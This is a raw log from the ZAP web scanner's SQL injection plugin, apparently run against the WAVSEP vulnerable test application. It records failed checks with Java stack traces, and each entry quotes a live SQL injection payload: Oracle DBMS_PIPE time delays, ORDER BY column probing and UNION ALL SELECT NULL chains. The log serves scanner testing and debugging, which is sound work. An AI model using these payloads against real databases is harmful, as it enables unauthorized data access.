org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 3749=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(99)||CHR(101)||CHR(86),5) AND ('AIPi'='AIPi] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 3749=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(99)||CHR(101)||CHR(86),5) AND ('AIPi'='AIPi at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922519 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 6395=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(107)||CHR(90)||CHR(84),5) AND 'YQJw'='YQJw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 6395=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(107)||CHR(90)||CHR(84),5) AND 'YQJw'='YQJw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922521 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 1994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(68)||CHR(83)||CHR(72),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 1994=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(68)||CHR(83)||CHR(72),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922522 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8448=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(67)||CHR(72),5)-- IqLB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 8448=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(103)||CHR(67)||CHR(72),5)-- IqLB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922524 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922525 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 3477-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) ORDER BY 3477-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8922526 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922528 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922530 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922531 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922541 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922550 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8922551 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 